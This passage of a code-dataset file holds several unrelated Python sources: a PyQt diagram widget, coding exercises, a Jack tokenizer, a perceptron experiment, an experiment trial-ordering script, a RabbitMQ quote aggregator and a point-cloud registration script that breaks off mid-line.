self.textToolBar.addWidget(self.fontCombo)\n# self.textToolBar.addWidget(self.fontSizeCombo)\n# self.textToolBar.addAction(self.boldAction)\n# self.textToolBar.addAction(self.italicAction)\n# self.textToolBar.addAction(self.underlineAction)\n# self.textToolBar.hide()\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: add code for new backgrounds:\n # ------------------------------------------------------------\n def updateBackgroundImage(self, pText, pImage):\n # update globals in the cdDiagramScene:\n self.theImageFromFile = pImage\n self.theBackgroundNameFromFile = pText\n # update the appearance of the Control Panel buttons for background selection:\n self.windowPIFControlPanel.updateBackgroundImageButtons(pText, pImage)\n \n \n\n # ------------------------------------------------------------\n # 2010 - Mitja: add code for handling changing size of graphics scene rectangle:\n # ------------------------------------------------------------\n def updateSceneRectSize(self):\n \n # emit a signal to update scene size GUI controls:\n \n lDict = { \\\n 0: str(int(self.scene.width())), \\\n 1: str(int(self.scene.height())), \\\n # the depth() function is not part of QGraphicsScene, we add it for completeness:\n 2: str(int(self.scene.depth())), \\\n 3: str(self.scene.mySceneUnits) \\\n }\n\n\n # this crashes on Linux!!!\"\n CDConstants.printOut(\" TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO \", CDConstants.DebugTODO )\n # although version PIF Generator 1.2.1 works?!?! And it also displays the table correctly!!!!\n self.scene.signalThatSceneResized.emit(lDict)\n # version Ubuntu 10.04 LTS the Lucid Linux released April 2010\n # default Python is 2.6.5\n # has installed Qt 4.6.2\n # has installed PyQt 263938\n CDConstants.printOut(\" TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO \", CDConstants.DebugTODO )\n\n\n # self.sceneWidthLabel.setText(str(int(self.scene.width())))\n # self.sceneHeightLabel.setText(str(int(self.scene.height())))\n # self.sceneDepthLabel.setText(str(int(self.scene.depth())))\n # self.sceneUnitsLabel.setText(str(self.scene.mySceneUnits))\n\n lText = \"\"\n buttons = self.theButtonGroupForBackgrounds.buttons()\n for myButton in buttons:\n if myButton.isChecked() == True:\n lText = myButton.text()\n # CDConstants.printOut( \" \"+str( \"myButton.text() =\", myButton.text() )+\" \", CDConstants.DebugTODO )\n \n self.updateSceneBackgroundImage(lText)\n\n# if self.theImageNameFromFile is \"BlankBackground\":\n# lBoringPixMap = QtGui.QPixmap(int(self.scene.width()), int(self.scene.height()))\n# lBoringPixMap.fill( QtGui.QColor(QtCore.Qt.white) )\n# self.theImageFromFile = QtGui.QImage(lBoringPixMap)\n# self.updateBackgroundImage(self.theImageNameFromFile, self.theImageFromFile)\n \n\n\n\n# 2011 - Mitja: uncomment createPixmapCellWidget to use pixmap items in Cell Scene:\n#\n# # ------------------------------------------------------------\n# # 2010 - Mitja: add code for handling insertion of pixmap items:\n# # ------------------------------------------------------------\n# def createPixmapCellWidget(self, pText) : # was: , pPixmap):\n#\n# # 2010 - Mitja: if there is no pixmap yet, make it a simple boring one:\n# lBoringPixMap = QtGui.QPixmap(128, 128)\n# lBoringPixMap.fill( QtGui.QColor(QtCore.Qt.darkGray) )\n# lPixmap = lBoringPixMap\n# item = DiagramPixmapItem(lPixmap, self.editMenu)\n# icon = QtGui.QIcon(item.pixmapForIconFromPolygon())\n#\n# button = QtGui.QToolButton()\n# button.setIcon(icon)\n# 
button.setIconSize(QtCore.QSize(50, 50))\n#         button.setCheckable(True)\n#         self.theButtonGroupForRegionShapes.addButton(button)\n#\n#         layout = QtGui.QGridLayout()\n#         layout.setMargin(2)\n#         layout.addWidget(button, 0, 0, QtCore.Qt.AlignHCenter)\n#         layout.addWidget(QtGui.QLabel(pText), 1, 0, QtCore.Qt.AlignCenter)\n#\n#         widget = QtGui.QWidget()\n#         widget.setLayout(layout)\n#\n#         return widget\n\n\n\n    def createColorToolButtonIcon(self, imageFile, color):\n        pixmap = QtGui.QPixmap(50, 80)\n        pixmap.fill(QtCore.Qt.transparent)\n        painter = QtGui.QPainter(pixmap)\n        lImage = QtGui.QPixmap(imageFile)\n        target = QtCore.QRect(0, 0, 50, 60)\n        source = QtCore.QRect(0, 0, 42, 42)\n        painter.fillRect(QtCore.QRect(0, 60, 50, 80), color)\n        painter.drawPixmap(target, lImage, source)\n        painter.end()\n\n        return QtGui.QIcon(pixmap)\n\n\n\n\n# ------------------------------------------------------------\n# ------------------------------------------------------------\nif __name__ == '__main__':\n\n    import sys\n\n    app = QtGui.QApplication(sys.argv)\n\n\n    mainWindow = QtGui.QMainWindow()\n    mainWindow.setGeometry(100, 100, 900, 500)\n\n    mainWidget = CDDiagramSceneMainWidget(mainWindow)\n    # mainWidget.setGeometry(100, 100, 900, 500)\n    \n    mainWindow.setCentralWidget(mainWidget)\n\n    # 2010 - Mitja: QMainWindow.raise_() must be called after QMainWindow.show()\n    #   otherwise the PyQt/Qt-based GUI won't receive foreground focus.\n    #   It's a workaround for a well-known bug caused by PyQt/Qt on Mac OS X\n    #   as shown here:\n    #   http://www.riverbankcomputing.com/pipermail/pyqt/2009-September/024509.html\n    mainWindow.raise_()\n    mainWindow.show()\n\n    sys.exit(app.exec_())\n\n# ------------------------------------------------------------\n# ------------------------------------------------------------\n\n# Local Variables:\n# coding: US-ASCII\n# End:\n","sub_path":"CellDraw/1.5.2/src/cdDiagramScene.py","file_name":"cdDiagramScene.py","file_ext":"py","file_size_in_byte":195450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"608506426","text":"'''\nDoubling the values of a list through a function.\n'''\n\ndef dobrar(lista):\n    for c, v in enumerate(lista):\n        lista[c] = v * 2\n        # returns nothing\n\n\nvalores = [7, 5, 3, 9]\nprint(valores)\ndobrar(valores)\n# even though the function returns nothing, the list was modified\nprint(valores)\n","sub_path":"exercicio_py/ex0077_dobra_valor_lista.py","file_name":"ex0077_dobra_valor_lista.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224894369","text":"#!/usr/bin/python3 -u\n# -*- mode:python3; coding:utf-8; tab-width:4 -*-\n\nimport sys, os, glob\nimport JackTokenizer as jt\nimport CompilationEngine as ce\n\ndef main():\n    path = sys.argv[1]\n\n    if os.path.isfile(path):\n        file_list = [sys.argv[1]]\n    else:\n        if path[-1] != '/':\n            path = path + '/'\n        file_list = glob.glob(path + '*.jack')\n\n    for input_file in file_list:\n        j = jt.JackTokenizer(input_file)\n        output_file = input_file.replace('.jack', 'T.xml')\n        fout = open(output_file, 'wt')\n\n        fout.write('<tokens>' + '\\n')\n\n        while j.hasMoreTokens():\n            while j.token_list:\n                j.advance()\n                if j.tokenType() == jt.KEYWORD:\n                    key = [k for k, v in jt.keyword_dict.items() if v == j.keyWord()][0]\n                    fout.write('<keyword> ' + key + ' </keyword>' + '\\n')\n                elif j.tokenType() == jt.SYMBOL:\n                    fout.write('<symbol> ' + j.symbol() + ' </symbol>' + '\\n')\n                elif j.tokenType() == jt.IDENTIFIER:\n                    fout.write('<identifier> ' + j.identifier() + ' </identifier>' + '\\n')\n                elif j.tokenType() == jt.INT_CONST:\n                    fout.write('<integerConstant> ' 
+ str(j.intVal()) + ' </integerConstant>' + '\\n')\n                elif j.tokenType() == jt.STRING_CONST:\n                    fout.write('<stringConstant> ' + j.stringVal() + ' </stringConstant>' + '\\n')\n\n        fout.write('</tokens>' + '\\n')\n\n        j.f.close()\n        fout.close()\n\nif __name__=='__main__':\n    main()\n","sub_path":"10/JackAnalyzer_forPhase1.py","file_name":"JackAnalyzer_forPhase1.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"625927334","text":"# -*- coding:utf-8 -*-\n"""\n15. Given two binary trees A and B, determine whether B is a substructure of A. (Note: by convention, an empty tree is not a substructure of any tree.)\nApproach:\n1) Traverse tree A looking for a node whose value matches B's root\n2) How to stop as soon as a match is found: return alone does not break out of the recursion; the 'if not res:' guard is what prevents further traversal once a match has been found\n3) res must take its value in three separate cases\n\n"""\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\nclass Solution:\n    def HasSubtree(self, pRoot1, pRoot2):\n        # write code here\n        if pRoot1==None or pRoot2==None:\n            return False\n        res=False\n        if pRoot1.val==pRoot2.val:\n            res = self.jude(pRoot1,pRoot2)\n        if not res:\n            res=self.HasSubtree(pRoot1.left,pRoot2) or self.HasSubtree(pRoot1.right,pRoot2)\n        return res\n\n    def jude(self,a,b):\n        if b==None:\n            return True\n        if a==None :\n            return False\n        if a.val!=b.val :\n            return False\n        return self.jude(a.left,b.left) and self.jude(a.right,b.right)","sub_path":"DataStruct/have_sub_tree.py","file_name":"have_sub_tree.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"651744981","text":"# B\nN = int(input())\nA = list(map(int, input().split()))\n\nodd = 0\neven = 0\nfor i in range(N):\n    if A[i] % 2 == 0:\n        even += 1\n    else:\n        odd += 1\n\nans = 3 ** N - 2 ** even\nprint(ans)","sub_path":"AtCoder_Python/other_contest/CODE_FESTIVAL_2017_qual_C/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"323162896","text":"import pickle\n\nfrom flask import Blueprint, abort\n\nfrom server import cache\n\nget_token_data = Blueprint("get_token_data", __name__)\n\n\n@get_token_data.route("/<token>", methods=["GET"])\ndef get_token(token):\n    token = str(token)\n    if token not in cache:\n        abort(404)\n\n    obj = pickle.loads(cache[token])\n    return obj["path"]\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45387149","text":""""\r\nNNCI Project 1\r\nAuthor: Ashwin Vaidya, S3911888\r\nAuthor: Hari Vidharth, S4031180\r\n"""\r\n\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nplt.style.use("ggplot")\r\nCValues = [0]\r\nCValuesNValuesVsQls = {}\r\nNValues = [50, 100, 200]\r\nRandomDatasetsNd = 100\r\nMeanMu = 0\r\nStandardDeviationSigma = 1\r\nEpochsNmax = 1000\r\nPlotAlphaValues = []\r\ny = []\r\n\r\nfor CValue in CValues:\r\n    C = CValue\r\n    print("C Value {0}/{1}".format(C, CValues[-1]))\r\n    NValuesVsQls = {}\r\n    for NValue in NValues:\r\n        N = NValue\r\n        print("N Value {0}/{1}".format(N, NValues[-1]))\r\n        Qls = []\r\n        Alpha = 0.0\r\n        for AlphaValue in range(0, 20):\r\n            Alpha += 0.25\r\n            print("Alpha Value {0}".format(Alpha), end="\\r")\r\n            AccuracyValues = []\r\n            for Dataset in range(0, RandomDatasetsNd):\r\n                print("Dataset {0}/{1}".format(Dataset + 1, RandomDatasetsNd), end="\\r")\r\n                P = int(Alpha * N)\r\n                X = np.random.normal(MeanMu, StandardDeviationSigma, (P, N))\r\n                Y = np.random.choice([-1, +1], size=(P, 1), p=[1/2, 1/2])\r\n                W = 
np.zeros((1, N))\r\n for Epoch in range(0, EpochsNmax):\r\n print(\"Epoch {0}/{1}\".format(Epoch + 1, EpochsNmax), end=\"\\r\")\r\n LocalPotentialEValues = []\r\n for Location, Feature in enumerate(X):\r\n LocalPotentialE = np.dot(W, Feature) * Y[Location]\r\n if LocalPotentialE[0] <= C:\r\n W = W + ((1 / N) * Feature * Y[Location])\r\n LocalPotentialEValues.append(LocalPotentialE[0])\r\n if np.min(LocalPotentialEValues) > 0:\r\n break\r\n CorrectlyClassified = 0.0\r\n for Location, Feature in enumerate(X):\r\n if np.sign(np.dot(W, Feature)) == Y[Location]:\r\n CorrectlyClassified += 1.0\r\n Accuracy = CorrectlyClassified/P\r\n AccuracyValues.append(Accuracy)\r\n LinearSeparability = 0.0\r\n for Location, AccuracyValue in enumerate(AccuracyValues):\r\n if AccuracyValue == 1.0:\r\n LinearSeparability += 1.0\r\n FinalAccuracy = LinearSeparability / len(AccuracyValues)\r\n Qls.append(FinalAccuracy)\r\n NValuesVsQls[N] = Qls\r\n CValuesNValuesVsQls[C] = NValuesVsQls\r\n\r\nprint(CValuesNValuesVsQls)\r\n\r\nAlpha = 0.0\r\nfor Value in range(0, 20):\r\n Alpha += 0.25\r\n PlotAlphaValues.append(Alpha)\r\n\r\nfor Items, Values in CValuesNValuesVsQls.items():\r\n for Item, Value in Values.items():\r\n y.append(Value)\r\n\r\nplt.figure(0)\r\nplt.plot(PlotAlphaValues, y[0], \"-r\", label=\"N = 50\")\r\nplt.plot(PlotAlphaValues, y[1], \"-g\", label=\"N = 100\")\r\nplt.plot(PlotAlphaValues, y[2], \"-b\", label=\"N = 200\")\r\nplt.xlabel(\"Alpha Values\")\r\nplt.ylabel(\"Ql.s.\")\r\nplt.title(\"Ql.s. of Linearly Separable Functions vs Alpha\")\r\nplt.legend(loc=\"upper right\")\r\nplt.show()\r\n\r\n\"\"\"\r\nplt.figure(1)\r\nplt.plot(PlotAlphaValues, y[3], \"-r\", label=\"N = 50\")\r\nplt.plot(PlotAlphaValues, y[4], \"-g\", label=\"N = 100\")\r\nplt.plot(PlotAlphaValues, y[5], \"-b\", label=\"N = 200\")\r\nplt.xlabel(\"Alpha Values\")\r\nplt.ylabel(\"Ql.s.\")\r\nplt.title(\"Ql.s. of Linearly Separable Functions vs Alpha\")\r\nplt.legend(loc=\"upper right\")\r\n\"\"\"\r\n","sub_path":"RB_2.py","file_name":"RB_2.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"327515344","text":"import random, os, pickle, trial_constants\n\nos.chdir('/Users/daisy/Desktop/proj/eyeballs/experiments/eyetracking/dl_exp/code/')\nprint(os.getcwd())\n\ndef order_trials(trials_list, current_list):\n\n\tdef get_trial_list(trials_list, current_list):\n\t\twith open(trials_list, mode = \"rb\") as fileObj:\n\t\t\tall_lists_all_trials = pickle.load(fileObj)\n\t\tall_trials = [x for x in all_lists_all_trials if x.list == current_list]\n\t\trandom.shuffle(all_trials)\n\t\treturn all_trials\n\n\tdef initial_trials(all_trials):\n\t\t# here we make two initial trials that use audios that dont appear elsewhere, so participants get familirized w. 
the paradigm\n\t\t# we randomize the order of the audio files, and the control-type trials they appear with (ie either T,T or V,V)\n\t\tinitial_trial1 = trial_constants.Trial(index = 0, list = current_list, criticality = 'INITIAL_TWO_TRIALS')\n\t\tinitial_trial2 = trial_constants.Trial(index = 1, list = current_list, criticality = 'INITIAL_TWO_TRIALS')\n\t\tfiller_type = ['T', 'V']\n\t\taudios = ['dh_AM_basketball_game_p1_CA3_CA48_p3_GA1_NY2.wav', 'hrt_AM_golf_game_p1_GA1_CA45_p3_GA3_CA2.wav']\n\t\trandom.shuffle(filler_type)\n\t\trandom.shuffle(audios)\n\n\t\tinitial_trial1.img_left_type = filler_type.pop()\n\t\tinitial_trial1.img_right_type = initial_trial1.img_left_type\n\n\t\tinitial_trial2.img_left_type = filler_type.pop()\n\t\tinitial_trial2.img_right_type = initial_trial2.img_left_type\n\n\t\tinitial_trial1.audio = audios.pop()\n\t\tinitial_trial2.audio = audios.pop()\n\n\t\tall_trials.append(initial_trial1)\n\t\tall_trials.append(initial_trial2)\n\t\treturn all_trials\n\n\n\tdef order_crits_and_fillers(all_trials):\n\t\t# assign random index to each twin (i.e., each filler)\n\t\ttwindices = random.sample(range(2, 10000), 12)\n\t\trandom_used = twindices # (keep track of used indices)\n\t\tfor trial in all_trials:\n\t\t\tif trial.criticality == 'FILLER':\n\t\t\t\ttrial.index = twindices.pop()\n\n\t\t# now assign each crit a random index that is lower than that of its twin\n\t\t# this is to ensure the twin comes after the crit\n\t\tfor trial in all_trials:\n\t\t\tif trial.criticality == 'CRITICAL':\n\t\t\t\tif trial.audio.startswith('neut'):\n\t\t\t\t\tcrit_stim = (' ').join(trial.audio.split('_')[2:-5])\n\t\t\t\telse:\n\t\t\t\t\tcrit_stim = (' ').join(trial.audio.split('_')[2:-6])\n\n\t\t\t\tfor twintrial in all_trials:\n\t\t\t\t\tif twintrial.criticality == 'FILLER':\n\t\t\t\t\t\tif twintrial.audio.startswith('neut'):\n\t\t\t\t\t\t\ttwin_stim = (' ').join(twintrial.audio.split('_')[2:-5])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttwin_stim = (' ').join(twintrial.audio.split('_')[2:-6])\n\t\t\t\t\t\tif twin_stim == crit_stim:\n\t\t\t\t\t\t\ttwindex = twintrial.index\n\t\t\t\t\t\t\tcrindex = None\n\t\t\t\t\t\t\twhile crindex in random_used or crindex is None:\n\t\t\t\t\t\t\t\tcrindex = random.randint(2, twindex)\n\t\t\t\t\t\t\ttrial.index = crindex\n\t\t\t\t\t\t\trandom_used.append(crindex)\n\t\treturn all_trials\n\n\tdef ensure_no_neigbors(all_trials):\n\t\t# check how many neighbors there are.\n\t\t# if neighbors > 0, we run all of order_trials again until neighbors == 0. 
loop is called outside the order_trials function\n\t\tall_trials.sort(key=lambda x: x.index)\n\t\tsame_neighbor_count = 0\n\t\tfor i in range(len(all_trials)-2):\n\t\t\tif all_trials[i].audio == all_trials[i+1].audio or all_trials[i].audio == all_trials[i+2].audio:\n\t\t\t\tsame_neighbor_count += 1\n\t\treturn same_neighbor_count\n\n\n\tall_trials = get_trial_list(trials_list, current_list)\n\tall_trials = initial_trials(all_trials)\n\tall_trials = order_crits_and_fillers(all_trials)\n\tsame_neighbor_count = ensure_no_neigbors(all_trials)\n\treturn same_neighbor_count, all_trials\n\t#\n\t#\n\t# def add_fillers(all_trials, random_used):\n\t# \t# now we have crits and twins in place, need to randomly assign fillers\n\t# \tfor trial in all_trials:\n\t# \t\tif trial.criticality == 'FILLER' and trial.index == None:\n\t# \t\t\tfindex = None\n\t# \t\t\twhile findex in random_used or findex is None:\n\t# \t\t\t\tfindex = random.randint(min(random_used), 10000) #starting at min(random_used) rather than 2 to reduce risk of neighbors, as 0,1, are fillers\n\t# \t\t\ttrial.index = findex\n\t# \treturn all_trials\n\t#\n\t#\n\t# def ensure_no_neigbors(all_trials):\n\t# \t# check how many neighbors there are.\n\t# \t# in practice, if neighbors > 0, we run all of order_trials again until neighbors == 0\n\t# \tall_trials.sort(key=lambda x: x.index)\n\t# \tsame_neighbor_count = 0\n\t# \tfor i in range(len(all_trials)-2):\n\t# \t\tif all_trials[i].audio == all_trials[i+1].audio or all_trials[i].audio == all_trials[i+2].audio:\n\t# \t\t\tsame_neighbor_count += 1\n\t# \tprint(same_neighbor_count)\n\t# \treturn same_neighbor_count\n\t#\n\t# all_trials = get_trial_list(trials_list, current_list)\n\t# all_trials = assign_initial_trials(all_trials)\n\t# all_trials, random_used = assign_crits_and_twins(all_trials)\n\t# all_trials = add_fillers(all_trials, random_used)\n\t# same_neighbor_count = ensure_no_neigbors(all_trials)\n\t#\n\t# return same_neighbor_count, all_trials\n\n\ncurrent_list = '1'\n## get list of audios w criticality\nwhile True:\n\tsame_neighbor_count, all_trials = order_trials('trials/trial_lists.obj', current_list)\n\tif same_neighbor_count == 0:\n\t\tbreak\n#\nfor t in all_trials:\n\tprint(t.audio + ' ' + t.criticality + ' '+ t.img_left_type + ' '+ t.img_right_type+ ' ' + str(t.index))\n","sub_path":"experiments/eyetracking/exp_1/code/scratch/SCRATCH_order_trials.py","file_name":"SCRATCH_order_trials.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"151538080","text":"import os\nimport json\nimport time\nimport pika\n\nrate = 100\nresultList = []\nnum_banks = 0\nqouteListCount = 0\n\ndef main():\n bind_exchange()\n connect_recipientList()\n\n\ndef bind_exchange():\n global channel2\n connection2 = pika.BlockingConnection(pika.ConnectionParameters('datdb.cphbusiness.dk'))\n channel2 = connection2.channel()\n\n channel2.exchange_declare(exchange='g1.aggregator',\n exchange_type='direct')\n\n channel2.queue_declare(queue='g1.aggr')\n\n\n channel2.queue_bind(exchange='g1.aggregator',\n routing_key='toAggregator',\n queue='g1.aggr')\n\n\ndef connect_recipientList():\n connection = pika.BlockingConnection(pika.ConnectionParameters('datdb.cphbusiness.dk'))\n channel = connection.channel()\n\n channel.exchange_declare(exchange='g1.queue.aggregator', exchange_type='direct')\n\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n\n 
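# bind the exclusive, auto-named callback queue to the 'recipientList' routing key, so this consumer receives recipient-list messages from the exchange:\n    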
channel.queue_bind(exchange='g1.queue.aggregator',\n                       routing_key='recipientList',\n                       queue=queue_name)\n\n    print(' [*] Waiting for logs recipientlist. To exit press CTRL+C')\n\n    channel.basic_consume(callback_recipientList,\n                          queue=queue_name)\n\n    channel.start_consuming()\n\ndef callback_recipientList(ch, method, properties, body):\n    global num_banks\n    print(body)\n    body = body.decode('utf-8')\n    load = json.loads(body)\n    print(load)\n    num_banks = load['num_banks']\n    ch.basic_ack(delivery_tag = method.delivery_tag)\n    connect_normalizer()\n\ndef connect_normalizer():\n    global channel2\n\n    print(' [*] Waiting for logs normalizer. To exit press CTRL+C')\n\n    channel2.basic_consume(callback_normalizer,\n                           queue='g1.aggr')\n\n    channel2.start_consuming()\n\ndef callback_normalizer(ch, method, properties, body):\n    ch.basic_ack(delivery_tag = method.delivery_tag)\n    global resultList\n    print("normalizer, received", body)\n    jsonList(json.loads(body))\n    print("num_banks: ", num_banks, ", resultlist: ", len(resultList))\n    if (num_banks == len(resultList)):\n        print("quoting")\n        bestQuote()\n        ch.stop_consuming()\n        reset_data()\n\ndef reset_data():\n    global rate\n    global resultList\n    global num_banks\n    global qouteListCount\n    rate = 100\n    resultList = []\n    num_banks = 0\n    qouteListCount = 0\n\ndef jsonList(input):\n    print('jsonList() DEF', input)\n    global resultList\n    resultList.append(input)\n    return resultList\n\ndef bestQuote():\n    global rate\n    #global finalResultList\n    global resultList\n    global qouteListCount\n    for position in resultList:\n        qouteListCount += 1\n        if isinstance(position, dict):\n            position = json.dumps(position)\n        load = json.loads(position)\n        currentInterestRate = float(load["interestRate"])\n        if currentInterestRate <= rate:\n            #if currentInterestRate == rate: /////// what if two banks have the same interest rate?\n                #rate = currentInterestRate\n                #ssn = load["ssn"]\n                #finalResultList.append('{"interestRate":' + str(rate) + ', "ssn":' + str(ssn) + '}')\n            #else:\n            rate = currentInterestRate\n            ssn = load["ssn"]\n    #if len(finalResultList) != 0 and qouteListCount == len(resultList):\n    #    for position in finalResultList:\n    #        print(position)\n    #    return finalResultList\n    if qouteListCount == len(resultList):\n        #finalResultList\n        print('{"interestRate":' + str(rate) + ', "ssn":' + str(ssn) + '}')\n        return '{"interestRate":' + str(rate) + ', "ssn":' + str(ssn) + '}'\n\nif __name__ == '__main__':\n    main()\n","sub_path":"LB_Aggregator/aggregator.py","file_name":"aggregator.py","file_ext":"py","file_size_in_byte":3737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"184291901","text":"# use brute-force correspondences to register 3D Match training data\n# enumerate all possible pairs of the training data\n# use TEASER only, no RANSAC\nimport os\nimport numpy as np\nimport open3d as o3d\nimport teaserpp_python\nimport time\nimport scipy.io\nfrom helpers import *\n\n# hyper parameters\nALL_ALL_CORR_LIMIT = 20000 # upper limit for all-to-all correspondences\nNOISE_BOUND = 0.1\nVOXEL_SIZE_INIT = 0.5\nVOXEL_SIZE_STEP = 0.05\nICP_TH = 0.05\nICP_MAXITERS = 1000\nTIM_INLIER_RATIO_TH = 0.8\nRANSAC_MAXITERS_LOW = int(1e5)\nRANSAC_MAXITERS_HIGH = int(1e6) # run RANSAC one million times\n\n# obtain all training pairs in the training data\nthreedmatch_path = '../../Datasets/threedmatch'\npairs_all, pairs_30, pairs_50, pairs_70 = \\\n    get3DMatchTrainPairs(threedmatch_path)\n\n# choose the category of pairs to register\npairs_register = 
[pairs_70[1136]]\n\n# start registering\n# GT transformation (A and B are already registered)\nR_gt = np.diag([1.0,1.0,1.0])\nt_gt = np.zeros(3)\nnrPairs = len(pairs_register)\nprint(f'Total number of pairs to register: {nrPairs}.')\n# things to log:\n# overlap rate 1\n# R_err_teaser, t_err_teaser 2\n# R_err_icp_teaser, t_err_icp_teaser 2\n# teaser_tim_inlier_rate 1\n# teaser_best_subopt 1\n# teaser_nrMCInliers 1\n# fitness_teaser, fitness_icp_teaser 2\nlog_results = np.zeros((nrPairs,1+2+2+1+1+1+2))\nfor pair_idx, pair in enumerate(pairs_register):\n A_path = pair[0]\n B_path = pair[1]\n overlap = float(pair[2])\n print(f'Register pair {pair_idx}: {A_path} and {B_path}, overlap: {overlap}.')\n\n # load the point clouds from .npz files\n cloudA = np.load(os.path.join(threedmatch_path,A_path))\n cloudB = np.load(os.path.join(threedmatch_path,B_path))\n A_xyz = cloudA['pcd']\n A_rgb = cloudA['color']\n B_xyz = cloudB['pcd']\n B_rgb = cloudB['color']\n print(f'Before downsample: # of points in A: {A_xyz.shape[0]}, # of points in B: {B_xyz.shape[0]}.')\n A_pcd = o3d.geometry.PointCloud()\n B_pcd = o3d.geometry.PointCloud()\n A_pcd.points = o3d.utility.Vector3dVector(A_xyz)\n A_pcd.colors = o3d.utility.Vector3dVector(A_rgb)\n B_pcd.points = o3d.utility.Vector3dVector(B_xyz)\n B_pcd.colors = o3d.utility.Vector3dVector(B_rgb)\n\n\n # downsample A and B until number of points is small enough\n N = 2*ALL_ALL_CORR_LIMIT\n VOXEL_SIZE = VOXEL_SIZE_INIT - VOXEL_SIZE_STEP\n while N > ALL_ALL_CORR_LIMIT:\n VOXEL_SIZE = VOXEL_SIZE + VOXEL_SIZE_STEP\n A_pcd_ds = A_pcd.voxel_down_sample(voxel_size=VOXEL_SIZE)\n B_pcd_ds = B_pcd.voxel_down_sample(voxel_size=VOXEL_SIZE)\n A_ds_xyz = np.asarray(A_pcd_ds.points)\n B_ds_xyz = np.asarray(B_pcd_ds.points)\n NA = A_ds_xyz.shape[0]\n NB = B_ds_xyz.shape[0]\n N = NA * NB\n print(f'After downsample with voxel size {VOXEL_SIZE}: # of points in A: {NA}, # of points in B: {NB}, all-to-all corrs: {N}.')\n\n # create an all-to-all correspondence set\n A_ds_xyz = A_ds_xyz.T # shape 3 by NA\n B_ds_xyz = B_ds_xyz.T # shape 3 by NB\n A_corr = np.repeat(A_ds_xyz,NB,axis=1)\n B_corr = np.tile(B_ds_xyz,(1,NA))\n assert (A_corr.shape[1] == N) and (B_corr.shape[1]), 'A_corr and B_corr wrong dimension'\n print(f'Created {N} all-to-all correspondences.')\n\n # use TEASER to register\n # create a TEASER solver\n solver_params = teaserpp_python.RobustRegistrationSolver.Params()\n solver_params.cbar2 = 1.0\n solver_params.noise_bound = NOISE_BOUND\n solver_params.estimate_scaling = False\n solver_params.rotation_tim_graph = teaserpp_python.RobustRegistrationSolver.INLIER_GRAPH_FORMULATION.CHAIN\n # solver_params.rotation_tim_graph = teaserpp_python.RobustRegistrationSolver.INLIER_GRAPH_FORMULATION.COMPLETE\n solver_params.rotation_estimation_algorithm = teaserpp_python.RobustRegistrationSolver.ROTATION_ESTIMATION_ALGORITHM.GNC_TLS\n solver_params.rotation_gnc_factor = 1.4\n solver_params.rotation_max_iterations = 10000\n solver_params.rotation_cost_threshold = 1e-16\n solver = teaserpp_python.RobustRegistrationSolver(solver_params)\n solver.solve(A_corr,B_corr)\n solution = solver.getSolution()\n R_teaser = solution.rotation\n t_teaser = solution.translation\n teaser_T = Rt2T(R_teaser,t_teaser)\n # obtain number of inliers survived maximum clique\n teaser_nrMCInliers = len(solver.getInlierMaxClique())\n\n fitness_teaser = computeFitnessScore(A_pcd_ds,B_pcd_ds,NOISE_BOUND,teaser_T)\n # certify TEASER's result (rotation part)\n A_TIMs = solver.getMaxCliqueSrcTIMs()\n B_TIMs = 
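A quick NumPy check of the all-to-all correspondence construction used above: np.repeat on the source columns plus np.tile on the target columns enumerates every (A_i, B_j) pair exactly once. The toy points below are invented.

import numpy as np

A = np.array([[0., 1.],
              [0., 1.],
              [0., 1.]])          # 2 source points, one per column
B = np.array([[10., 20., 30.],
              [10., 20., 30.],
              [10., 20., 30.]])   # 3 target points, one per column
NA, NB = A.shape[1], B.shape[1]
A_corr = np.repeat(A, NB, axis=1)  # columns: A0 A0 A0 A1 A1 A1
B_corr = np.tile(B, (1, NA))       # columns: B0 B1 B2 B0 B1 B2
assert A_corr.shape == B_corr.shape == (3, NA * NB)
print(list(zip(A_corr[0], B_corr[0])))  # all six (A_i, B_j) pairings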
solver.getMaxCliqueDstTIMs()\n theta_TIMs_raw = solver.getRotationInliersMask()\n nrRotationInliers = np.sum(theta_TIMs_raw)\n theta_TIMs = getBinaryTheta(theta_TIMs_raw)\n certifier_params = teaserpp_python.DRSCertifier.Params()\n certifier_params.cbar2 = 1.0\n certifier_params.noise_bound = 2*NOISE_BOUND\n certifier_params.sub_optimality = 1e-3\n certifier_params.max_iterations = 1e3\n certifier_params.gamma_tau = 2.0\n certifier = teaserpp_python.DRSCertifier(certifier_params)\n certificate = certifier.certify(R_teaser,A_TIMs,B_TIMs,theta_TIMs)\n teaser_best_subopt = certificate.best_suboptimality\n\n # compute pose error of TEASER\n teaser_tim_inlier_ratio = float(nrRotationInliers)/float(A_TIMs.shape[1])\n R_err_teaser = getRotationError(R_gt,R_teaser)\n t_err_teaser = getTranslationError(t_gt,t_teaser)\n print(f'TEASER: R_err: {R_err_teaser}[deg], t_err: {t_err_teaser}[m], fitness: {fitness_teaser}, tim_inlier_ratio: {teaser_tim_inlier_ratio}, best_subopt: 